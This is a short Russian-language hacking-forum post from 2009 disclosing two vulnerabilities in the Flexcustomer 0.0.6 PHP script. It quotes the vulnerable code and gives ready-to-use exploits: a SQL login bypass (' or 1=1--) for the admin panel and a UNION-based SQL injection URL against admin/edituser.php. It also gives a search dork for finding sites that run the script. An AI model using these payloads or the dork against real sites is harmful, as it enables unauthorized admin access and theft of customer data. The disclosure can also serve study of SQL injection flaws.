Уязвимости Flexcustomer

Discussion in 'Веб-уязвимости' started by Iceangel_, 2 Jun 2009.

  1. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Уязвимости Flexcustomer 0.0.6 (возможно уязвимы и более ранние версии)

    download: http://www.china-on-site.com/flexcust/flexcusten.zip

    dork: "Powered by Flexcustomer"

    1) [bypass] (требования: magic_quotes=off)
    не заметил, бага в паблике, но для следующей уязвимости она понадобится...
    admin/usercheck.php
    уязвимый код:
    PHP:
    if (!empty($logincheck)){
    $sql "select username,adminid from useradmin where username='$checkuser' and password='$checkpass'";
    эксплуатирование:
    Code:
    login:[b]' or 1=1--+[/b]

    2) [SQL-injection] (требования: magic_quotes=off, доступ в админ панель)

    /admin/edituser.php

    уязвимый код:
    PHP:
    <?php
    $userinfo     $db->getuserinfobyid($cid);
    /CustomSql.inc
    PHP:
       function getuserinfobyid($customerid)
       {      
              $sql "select * from customer where customerid='$customerid'";
              $result $this->select($sql);
          return     $result;
       }
    эксплуатирование:
    /admin/edituser.php?cid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
     
    #1 Iceangel_, 2 Jun 2009
    Last edited: 2 Jun 2009
    2 people like this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.